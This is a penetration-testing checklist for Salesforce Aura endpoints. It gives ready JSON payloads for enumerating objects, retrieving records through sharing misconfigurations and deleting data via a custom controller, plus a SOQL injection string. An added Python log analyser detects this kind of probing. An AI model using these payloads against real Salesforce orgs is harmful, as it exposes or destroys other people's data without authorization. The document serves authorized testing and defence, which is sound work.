Salesforce SaaS Apps Hacking
Preparation Phase
  Gather Tools
    - Burp Suite or OWASP ZAP (HTTP request/response interceptor)
  Set Up Environment
    - Configure the browser to proxy through Burp/ZAP
    - Ensure the target Salesforce application is accessible
Pre-Check
  Identify Salesforce Technologies
    - Browse the application via Burp/ZAP and check HTTP History for these paths:
        /s/sfsites/aura
        /aura
        /sfsites/aura
    - In Repeater, send a POST request to those paths and check the response for these patterns:
        "actions":[
        aura:clientOutOfSync
        aura:invalidSession
Reconnaissance
  Identify Standard Objects
    - Retrieve the list of standard objects from the Salesforce documentation
    - Save it to objects.txt
  Identify Custom Objects
    - Look for object names ending in __c
    - Use the getObjectInfo and getHostConfig actions
    - Add the results to objects.txt
  Identify Standard Controllers and Actions
    - Inspect the app.js and aura_prod.js files
    - Grep for the componentService.initControllerDefs([{ pattern
    - Save the identified controllers and actions
  Identify Custom Controllers and Actions
    - Inspect JS files and HTTP requests
    - Look for custom controllers whose descriptor starts with apex://
    - Save the identified controllers and actions
Fuzzing
  Set Up Fuzzing in Burp/ZAP
    - Send a POST request to the Aura endpoint to Repeater
    - Replace the message parameter with the payloads below
    - Use Intruder to fuzz the *** placeholder with objects.txt
  Fuzzing Actions
    getObjectInfo payload:
      {"actions":[{"id":"1;a","descriptor":"aura://RecordUiController/ACTION$getObjectInfo","params":{"objectApiName":"***"}}]}
    getConfigData payload:
      {"actions":[{"id":"1;a","descriptor":"aura://HostConfigController/ACTION$getConfigData","params":{}}]}
    getListsByObjectName payload:
      {"actions":[{"id":"1;a","descriptor":"aura://ListUiController/ACTION$getListsByObjectName","params":{"objectApiName":"***"}}]}
Retrieving Sensitive Information
  Check for Org-Wide Sharing Misconfigurations
    - Use the getItems action to retrieve records. Payload:
      {"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","params":{"entityNameOrId":"***","layoutType":"FULL","pageSize":100,"currentPage":0}}]}
    - Use the getRecord action to retrieve specific records. Payload:
      {"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","params":{"recordId":"***"}}]}
  Check for Custom Controller Misconfigurations
    - Identify custom actions such as getSalesData and deleteSalesDataById
    - Payload for retrieving data:
      {"actions":[{"id":"1;a","descriptor":"apex://New_Sales_Controller/ACTION$getSalesData","params":{}}]}
    - Payload for deleting data:
      {"actions":[{"id":"1;a","descriptor":"apex://New_Sales_Controller/ACTION$deleteSalesDataById","params":{"id":"***"}}]}
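A defender-side complement to the enumeration and record-retrieval checks above. This is an added example, not part of the original checklist: it parses the Aura message bodies out of constructed proxy-log entries and flags guest-session calls to custom (apex://) or record-returning actions, plus object-name enumeration from a single source. The log tuple layout, the session-kind field and the IP addresses are assumptions.

```python
import json
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

RECORD_ACCESS = {"getItems", "getRecord"}                # actions that return record data
ENUMERATION = {"getObjectInfo", "getListsByObjectName"}  # actions used to map objects

def parse_aura_message(body):  # Aura actions list from a form-encoded POST body ([] if absent/invalid)
    raw = parse_qs(body).get("message", [""])[0]
    try:
        return json.loads(raw).get("actions", [])
    except (ValueError, AttributeError):
        return []

def classify(descriptor):  # bucket an action descriptor into the categories the checklist probes
    action = descriptor.rsplit("$", 1)[-1]
    if descriptor.startswith("apex://"):
        return "custom-apex"
    return "record-access" if action in RECORD_ACCESS else "enumeration" if action in ENUMERATION else "other"

def analyze(entries, enum_threshold=3):
    """entries: (src, session_kind, path, body). Flags guest calls to custom/record actions and enumeration."""
    alerts, names_seen = defaultdict(list), defaultdict(set)
    for src, session, path, body in entries:
        if "/aura" not in path:  # only Aura endpoint traffic is relevant here
            continue
        for act in parse_aura_message(body):
            desc = act.get("descriptor", "")
            kind = classify(desc)
            if session == "guest" and kind in ("custom-apex", "record-access"):
                alerts[src].append(f"guest {kind}: {desc}")
            obj = act.get("params", {}).get("objectApiName")
            if kind == "enumeration" and obj:
                names_seen[src].add(obj)
    for src, names in names_seen.items():
        if len(names) >= enum_threshold:
            alerts[src].append(f"object enumeration: {len(names)} distinct objectApiName values")
    return dict(alerts)

def _body(actions):  # build a constructed Aura POST body (message=<url-encoded JSON>)
    return urlencode({"message": json.dumps({"actions": actions})})

# Constructed sample proxy-log entries, not real traffic: (source IP, session kind, path, body)
SAMPLE_LOG = [("10.0.0.5", "guest", "/s/sfsites/aura", _body([{"id": "1;a", "params": {"objectApiName": o},
               "descriptor": "aura://RecordUiController/ACTION$getObjectInfo"}])) for o in ("Account", "Contact", "Case")]
SAMPLE_LOG += [
    ("10.0.0.5", "guest", "/s/sfsites/aura", _body([{"id": "2;a", "params": {},
        "descriptor": "apex://New_Sales_Controller/ACTION$getSalesData"}])),
    ("10.0.0.9", "authenticated", "/aura", _body([{"id": "123;a", "params": {"recordId": "<record-id>"},
        "descriptor": "serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord"}])),
]
```

Running analyze(SAMPLE_LOG) reports only 10.0.0.5: one guest call to a custom apex:// action and one enumeration burst of three object names; the authenticated getRecord call from 10.0.0.9 produces no alert.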
SOQL Injection
  Identify Potential Injection Points
    - Inspect HTTP requests for parameters that are fed into SOQL queries
  Craft Injection Payloads
    - User input:
      name=test%') OR (Name LIKE '
    - Expected vulnerable query (input concatenated into the LIKE clause without escaping):
      SELECT Id FROM Contact WHERE (IsDeleted = false AND Name LIKE '%test%') OR (Name LIKE '%')
    - The injected OR (Name LIKE '%') clause matches every record, so the original filter is bypassed
Documentation and Reporting
  Document Findings
    - Note each identified object, controller, and action
    - Record fuzzing results and any sensitive data retrieved
    - Detail any successful SOQL injections and their impact
  Create a Comprehensive Report
    - Executive summary of findings
    - Detailed methodology and steps taken
    - Screenshots and evidence of vulnerabilities
    - Recommendations for remediation